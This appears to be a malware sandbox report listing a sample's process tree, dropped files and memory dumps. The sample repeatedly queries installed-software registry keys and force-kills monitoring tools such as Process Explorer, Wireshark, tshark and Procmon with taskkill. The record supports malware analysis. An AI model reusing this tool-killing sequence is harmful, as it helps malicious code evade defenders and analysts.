C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\.ntusernt.ini
-
C:\Users\Admin\hmJMe\Desktop.ini
-
C:\Users\Admin\hmJMe\Lwqbj.class
-
\Users\Admin\AppData\Local\Temp\WyQnhjYmDj7209558232339859040.xml
-
memory/408-143-0x0000000000000000-mapping.dmp
-
memory/408-54-0x0000000000000000-mapping.dmp
-
memory/412-139-0x0000000000000000-mapping.dmp
-
memory/412-67-0x0000000000000000-mapping.dmp
-
memory/536-94-0x0000026FC9620000-0x0000026FC9621000-memory.dmpFilesize
4KB
-
memory/536-69-0x0000000000000000-mapping.dmp
-
memory/536-105-0x0000026FE1930000-0x0000026FE1931000-memory.dmpFilesize
4KB
-
memory/536-80-0x00007FFFFAC40000-0x00007FFFFB62C000-memory.dmpFilesize
9.9MB
-
memory/572-97-0x0000000000000000-mapping.dmp
-
memory/628-68-0x0000000000000000-mapping.dmp
-
memory/636-144-0x0000000000000000-mapping.dmp
-
memory/800-219-0x0000000000000000-mapping.dmp
-
memory/928-256-0x0000000000000000-mapping.dmp
-
memory/964-245-0x0000000000000000-mapping.dmp
-
memory/1000-75-0x0000000000000000-mapping.dmp
-
memory/1000-50-0x0000000000000000-mapping.dmp
-
memory/1136-129-0x0000000000000000-mapping.dmp
-
memory/1252-181-0x0000000000000000-mapping.dmp
-
memory/1252-233-0x0000000000000000-mapping.dmp
-
memory/1276-230-0x0000000000000000-mapping.dmp
-
memory/1324-231-0x0000000000000000-mapping.dmp
-
memory/1356-138-0x0000000000000000-mapping.dmp
-
memory/1356-59-0x0000000000000000-mapping.dmp
-
memory/1360-76-0x0000000000000000-mapping.dmp
-
memory/1364-104-0x0000000000000000-mapping.dmp
-
memory/1364-196-0x0000000000000000-mapping.dmp
-
memory/1416-132-0x0000000000000000-mapping.dmp
-
memory/1448-103-0x0000000000000000-mapping.dmp
-
memory/1496-206-0x0000000000000000-mapping.dmp
-
memory/1536-192-0x0000000000000000-mapping.dmp
-
memory/1576-73-0x0000000000000000-mapping.dmp
-
memory/1576-145-0x0000000000000000-mapping.dmp
-
memory/1588-211-0x0000000000000000-mapping.dmp
-
memory/1588-60-0x0000000000000000-mapping.dmp
-
memory/1692-99-0x0000000000000000-mapping.dmp
-
memory/1724-61-0x0000000000000000-mapping.dmp
-
memory/1724-198-0x0000000000000000-mapping.dmp
-
memory/1764-255-0x0000000000000000-mapping.dmp
-
memory/1772-271-0x0000000000000000-mapping.dmp
-
memory/1952-182-0x0000000000000000-mapping.dmp
-
memory/1960-131-0x0000000000000000-mapping.dmp
-
memory/1960-232-0x0000000000000000-mapping.dmp
-
memory/2004-193-0x0000000000000000-mapping.dmp
-
memory/2096-98-0x0000000000000000-mapping.dmp
-
memory/2100-179-0x0000000000000000-mapping.dmp
-
memory/2224-147-0x0000000000000000-mapping.dmp
-
memory/2224-195-0x0000000000000000-mapping.dmp
-
memory/2248-220-0x0000000000000000-mapping.dmp
-
memory/2352-74-0x0000000000000000-mapping.dmp
-
memory/2352-106-0x0000000000000000-mapping.dmp
-
memory/2352-151-0x0000000000000000-mapping.dmp
-
memory/2388-268-0x0000000000000000-mapping.dmp
-
memory/2396-72-0x0000000000000000-mapping.dmp
-
memory/2396-141-0x0000000000000000-mapping.dmp
-
memory/2404-45-0x0000000000000000-mapping.dmp
-
memory/2668-240-0x0000000000000000-mapping.dmp
-
memory/2688-47-0x0000000000000000-mapping.dmp
-
memory/2716-163-0x0000000000000000-mapping.dmp
-
memory/2756-215-0x0000000000000000-mapping.dmp
-
memory/2760-246-0x0000000000000000-mapping.dmp
-
memory/2868-52-0x0000000000000000-mapping.dmp
-
memory/2872-70-0x0000000000000000-mapping.dmp
-
memory/2876-136-0x0000000000000000-mapping.dmp
-
memory/2976-48-0x0000000000000000-mapping.dmp
-
memory/3104-77-0x0000000000000000-mapping.dmp
-
memory/3200-188-0x0000000000000000-mapping.dmp
-
memory/3292-63-0x0000000000000000-mapping.dmp
-
memory/3300-184-0x0000000000000000-mapping.dmp
-
memory/3384-173-0x0000000000000000-mapping.dmp
-
memory/3416-259-0x0000000000000000-mapping.dmp
-
memory/3508-58-0x0000000000000000-mapping.dmp
-
memory/3644-262-0x0000000000000000-mapping.dmp
-
memory/3656-66-0x0000000000000000-mapping.dmp
-
memory/3720-135-0x0000000000000000-mapping.dmp
-
memory/3828-56-0x0000000000000000-mapping.dmp
-
memory/3828-102-0x0000000000000000-mapping.dmp
-
memory/3840-137-0x0000000000000000-mapping.dmp
-
memory/3840-186-0x0000000000000000-mapping.dmp
-
memory/3848-156-0x0000000000000000-mapping.dmp
-
memory/3852-49-0x0000000000000000-mapping.dmp
-
memory/3876-155-0x0000000000000000-mapping.dmp
-
memory/3904-57-0x0000000000000000-mapping.dmp
-
memory/3908-71-0x0000000000000000-mapping.dmp
-
memory/3908-133-0x0000000000000000-mapping.dmp
-
memory/3932-235-0x0000000000000000-mapping.dmp
-
memory/3948-272-0x0000000000000000-mapping.dmp
-
memory/3948-148-0x0000000000000000-mapping.dmp
-
memory/3960-243-0x0000000000000000-mapping.dmp
-
memory/3960-65-0x0000000000000000-mapping.dmp
-
memory/3980-189-0x0000000000000000-mapping.dmp
-
memory/4024-174-0x0000000000000000-mapping.dmp
-
memory/4036-227-0x0000000000000000-mapping.dmp
-
memory/4088-266-0x0000000000000000-mapping.dmp
-
memory/4104-100-0x0000000000000000-mapping.dmp
-
memory/4104-153-0x0000000000000000-mapping.dmp
-
memory/4116-187-0x0000000000000000-mapping.dmp
-
memory/4116-237-0x0000000000000000-mapping.dmp
-
memory/4144-78-0x0000000000000000-mapping.dmp
-
memory/4144-264-0x0000000000000000-mapping.dmp
-
memory/4156-236-0x0000000000000000-mapping.dmp
-
memory/4156-140-0x0000000000000000-mapping.dmp
-
memory/4160-150-0x0000000000000000-mapping.dmp
-
memory/4172-110-0x0000000000000000-mapping.dmp
-
memory/4172-248-0x0000000000000000-mapping.dmp
-
memory/4180-79-0x0000000000000000-mapping.dmp
-
memory/4196-167-0x0000000000000000-mapping.dmp
-
memory/4200-81-0x0000000000000000-mapping.dmp
-
memory/4200-202-0x0000000000000000-mapping.dmp
-
memory/4204-146-0x0000000000000000-mapping.dmp
-
memory/4220-241-0x0000000000000000-mapping.dmp
-
memory/4224-201-0x0000000000000000-mapping.dmp
-
memory/4236-101-0x0000000000000000-mapping.dmp
-
memory/4260-152-0x0000000000000000-mapping.dmp
-
memory/4280-170-0x0000000000000000-mapping.dmp
-
memory/4280-82-0x0000000000000000-mapping.dmp
-
memory/4280-209-0x0000000000000000-mapping.dmp
-
memory/4296-223-0x0000000000000000-mapping.dmp
-
memory/4296-83-0x0000000000000000-mapping.dmp
-
memory/4316-142-0x0000000000000000-mapping.dmp
-
memory/4320-221-0x0000000000000000-mapping.dmp
-
memory/4328-185-0x0000000000000000-mapping.dmp
-
memory/4344-199-0x0000000000000000-mapping.dmp
-
memory/4356-160-0x0000000000000000-mapping.dmp
-
memory/4360-159-0x0000000000000000-mapping.dmp
-
memory/4364-261-0x0000000000000000-mapping.dmp
-
memory/4364-169-0x0000000000000000-mapping.dmp
-
memory/4384-204-0x0000000000000000-mapping.dmp
-
memory/4384-249-0x0000000000000000-mapping.dmp
-
memory/4388-260-0x0000000000000000-mapping.dmp
-
memory/4388-109-0x0000000000000000-mapping.dmp
-
memory/4392-84-0x0000000000000000-mapping.dmp
-
memory/4396-252-0x0000000000000000-mapping.dmp
-
memory/4396-85-0x0000000000000000-mapping.dmp
-
memory/4396-208-0x0000000000000000-mapping.dmp
-
memory/4404-224-0x0000000000000000-mapping.dmp
-
memory/4420-253-0x0000000000000000-mapping.dmp
-
memory/4424-166-0x0000000000000000-mapping.dmp
-
memory/4424-115-0x0000000000000000-mapping.dmp
-
memory/4428-244-0x0000000000000000-mapping.dmp
-
memory/4436-205-0x0000000000000000-mapping.dmp
-
memory/4448-265-0x0000000000000000-mapping.dmp
-
memory/4452-250-0x0000000000000000-mapping.dmp
-
memory/4468-149-0x0000000000000000-mapping.dmp
-
memory/4472-263-0x0000000000000000-mapping.dmp
-
memory/4496-194-0x0000000000000000-mapping.dmp
-
memory/4500-86-0x0000000000000000-mapping.dmp
-
memory/4516-197-0x0000000000000000-mapping.dmp
-
memory/4536-269-0x0000000000000000-mapping.dmp
-
memory/4544-87-0x0000000000000000-mapping.dmp
-
memory/4560-225-0x0000000000000000-mapping.dmp
-
memory/4576-120-0x0000000000000000-mapping.dmp
-
memory/4588-88-0x0000000000000000-mapping.dmp
-
memory/4588-254-0x0000000000000000-mapping.dmp
-
memory/4604-157-0x0000000000000000-mapping.dmp
-
memory/4620-191-0x0000000000000000-mapping.dmp
-
memory/4624-216-0x0000000000000000-mapping.dmp
-
memory/4632-107-0x0000000000000000-mapping.dmp
-
memory/4636-247-0x0000000000000000-mapping.dmp
-
memory/4640-125-0x0000000000000000-mapping.dmp
-
memory/4648-229-0x0000000000000000-mapping.dmp
-
memory/4652-126-0x0000000000000000-mapping.dmp
-
memory/4652-89-0x0000000000000000-mapping.dmp
-
memory/4660-114-0x0000000000000000-mapping.dmp
-
memory/4664-213-0x0000000000000000-mapping.dmp
-
memory/4672-117-0x0000000000000000-mapping.dmp
-
memory/4676-228-0x0000000000000000-mapping.dmp
-
memory/4684-127-0x0000000000000000-mapping.dmp
-
memory/4684-177-0x0000000000000000-mapping.dmp
-
memory/4688-118-0x0000000000000000-mapping.dmp
-
memory/4688-257-0x0000000000000000-mapping.dmp
-
memory/4700-162-0x0000000000000000-mapping.dmp
-
memory/4740-90-0x0000000000000000-mapping.dmp
-
memory/4748-161-0x0000000000000000-mapping.dmp
-
memory/4756-226-0x0000000000000000-mapping.dmp
-
memory/4764-218-0x0000000000000000-mapping.dmp
-
memory/4772-123-0x0000000000000000-mapping.dmp
-
memory/4772-217-0x0000000000000000-mapping.dmp
-
memory/4784-239-0x0000000000000000-mapping.dmp
-
memory/4784-190-0x0000000000000000-mapping.dmp
-
memory/4788-238-0x0000000000000000-mapping.dmp
-
memory/4808-91-0x0000000000000000-mapping.dmp
-
memory/4816-116-0x0000000000000000-mapping.dmp
-
memory/4820-258-0x0000000000000000-mapping.dmp
-
memory/4824-267-0x0000000000000000-mapping.dmp
-
memory/4824-203-0x0000000000000000-mapping.dmp
-
memory/4840-128-0x0000000000000000-mapping.dmp
-
memory/4844-124-0x0000000000000000-mapping.dmp
-
memory/4860-207-0x0000000000000000-mapping.dmp
-
memory/4876-251-0x0000000000000000-mapping.dmp
-
memory/4880-92-0x0000000000000000-mapping.dmp
-
memory/4888-175-0x0000000000000000-mapping.dmp
-
memory/4900-121-0x0000000000000000-mapping.dmp
-
memory/4904-172-0x0000000000000000-mapping.dmp
-
memory/4920-171-0x0000000000000000-mapping.dmp
-
memory/4928-93-0x0000000000000000-mapping.dmp
-
memory/4928-164-0x0000000000000000-mapping.dmp
-
memory/4944-242-0x0000000000000000-mapping.dmp
-
memory/4952-183-0x0000000000000000-mapping.dmp
-
memory/4952-134-0x0000000000000000-mapping.dmp
-
memory/4952-95-0x0000000000000000-mapping.dmp
-
memory/4956-180-0x0000000000000000-mapping.dmp
-
memory/4960-222-0x0000000000000000-mapping.dmp
-
memory/5008-165-0x0000000000000000-mapping.dmp
-
memory/5044-130-0x0000000000000000-mapping.dmp
-
memory/5052-212-0x0000000000000000-mapping.dmp
-
memory/5056-154-0x0000000000000000-mapping.dmp
-
memory/5064-96-0x0000000000000000-mapping.dmp
-
memory/5088-178-0x0000000000000000-mapping.dmp
-
memory/5104-234-0x0000000000000000-mapping.dmp